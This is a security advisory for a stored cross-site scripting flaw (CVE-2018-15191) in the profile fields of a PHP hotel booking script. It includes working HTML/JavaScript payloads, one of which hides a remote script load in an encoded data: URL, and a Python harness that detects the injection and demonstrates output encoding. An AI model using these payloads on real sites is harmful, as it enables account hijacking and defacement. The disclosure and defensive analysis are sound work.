*************************
# Exploit Title: Hotel Booking Script 2.0.4 - Stored Cross-Site Scripting (HTML injection) via First Name, Last Name and Address
# Date: 07.08.2018
# Site Title: Hotel Booking
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/hotel-booking-script/
# Category: Web Application
# Version: 2.0.4
# Exploit Author: Vikas Chaudhary
# Web: https://gkaim.com/
# Contact: https://gkaim.com/contact-us/
# Published on : https://gkaim.com/cve-2018-15191-vikas-chaudhary/
# Tested on: Windows 10 - Firefox
# CVE: CVE-2018-15191

*****************************
# VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software-selling portal offering a wide range of innovative PHP scripts.
PHP Scripts Mall is a leading business and technology firm with a 12-year track record
of completing and implementing numerous projects across various verticals and domains.
It has more than 300 PHP scripts ready to buy.

# DESCRIPTION :- A stored cross-site scripting (HTML injection) vulnerability exists in the user-profile editor of the specified product.
The First Name, Last Name and Address fields accept arbitrary HTML and JavaScript, which is stored and later rendered
without output encoding. An attacker who registers a normal account can therefore run script in the browser of any admin
or guest who views the profile, redirect them to a malicious link, or deface the site by altering its interface.

***********************
Proof of Concept:-
————————-
1- Go to the site.
2- Select SIGN UP/IN => REGISTER, fill in the form and click REGISTER.
3- Open the verification e-mail and verify the account.
4- Return to the site and sign in with the verified e-mail address and password.
5- Select Profile => Edit Profile and paste the following code into the given fields.

In First Name=>
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>

In Last Name =>
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Vikas Chaudhary</a>

In Address =>
<div id="div1"><input value=""onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

6- Click SUBMIT.

7- The profile page now renders the injected HTML: the page layout is altered and the profile can no longer be edited through the normal interface.
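As an added illustration (not part of this advisory and not the vendor's code), the Python script below models the flaw behind the PoC: the three payloads above are stored as profile fields and rendered once by a template that interpolates them raw (the vulnerable behaviour) and once with HTML output encoding. The standard-library HTML parser then reports which tags and on* event handlers a browser would actually see in each rendering, and decodes the data: URL in the Last Name payload to expose the <script src=...> it hides behind numeric character references. The template, the field names and the name allowlist are assumptions made for the example.

```python
"""Stored-XSS check for profile fields, using the three PoC payloads above."""
import html
import re
from html.parser import HTMLParser

# The three strings from the PoC (constructed test input; the first and
# third are innerHTML mutation payloads, the second hides a <script> tag
# behind numeric character references inside a data: URL).
PAYLOADS = {
    "first_name": (
        '<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> '
        "<script>d.innerHTML=d.innerHTML</script>"
    ),
    "last_name": (
        '<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32'
        "&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101"
        "&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47"
        "&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112"
        '&#116&#62&#8203">Vikas Chaudhary</a>'
    ),
    "address": (
        '<div id="div1"><input value=""onmouseover=javascript:alert(1)"></div> '
        '<div id="div2"></div><script>document.getElementById("div2").innerHTML'
        ' = document.getElementById("div1").innerHTML;</script>'
    ),
}

# Hypothetical profile template; the real script's markup is not on the page.
PROFILE_TEMPLATE = '<h2>{first_name} {last_name}</h2>\n<p class="addr">{address}</p>'
TEMPLATE_TAGS = {"h2", "p"}


def render_profile_vulnerable(profile):
    """Interpolates the stored fields straight into HTML: what the PoC exploits."""
    return PROFILE_TEMPLATE.format(**profile)


def render_profile_hardened(profile):
    """Same template, every user-controlled value HTML-encoded for element content."""
    encoded = {k: html.escape(v, quote=True) for k, v in profile.items()}
    return PROFILE_TEMPLATE.format(**encoded)


class TagCollector(HTMLParser):
    """Records every start tag, on* attribute and href/src value the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers, self.urls = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)  # names are already lower-cased by html.parser
        for name, value in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
            if name in ("href", "src") and value:
                self.urls.append(value)  # character references already decoded


def _collect(rendered):
    collector = TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector


def injected_markup(rendered):
    """Tags and event handlers in the rendered page that the template did not emit."""
    c = _collect(rendered)
    return {"tags": sorted(set(c.tags) - TEMPLATE_TAGS), "handlers": c.handlers}


def data_url_bodies(rendered):
    """Decoded bodies of data: URLs in href/src, i.e. what a navigation would load."""
    c = _collect(rendered)
    return [u.split(",", 1)[1] for u in c.urls if u.lower().startswith("data:") and "," in u]


# Defence in depth for the name fields: a letter followed by letters, digits,
# spaces, dots, apostrophes or hyphens. Not a substitute for output encoding.
NAME_RE = re.compile(r"[^\W\d_][\w .'-]{0,63}")


def valid_name(value):
    return NAME_RE.fullmatch(value) is not None


if __name__ == "__main__":
    vulnerable = render_profile_vulnerable(PAYLOADS)
    print("raw rendering exposes:", injected_markup(vulnerable))
    print("hidden in data: URL:", data_url_bodies(vulnerable))
    print("encoded rendering exposes:", injected_markup(render_profile_hardened(PAYLOADS)))
    print("name allowlist accepts payload:", valid_name(PAYLOADS["first_name"]))
```

Encoding for the element-content context is the fix; the name allowlist is defence in depth only, because the Address field legitimately needs punctuation. Two caveats for anyone reproducing this: the First Name and Address payloads are mutation-XSS patterns that only fire when the page re-serialises and re-parses innerHTML, so a filter that passes a static check can still be bypassed in the browser; and current Firefox and Chrome block top-level navigation to data:text/html URLs, so the Last Name payload is still stored as an injected anchor but its hidden script will not load on click.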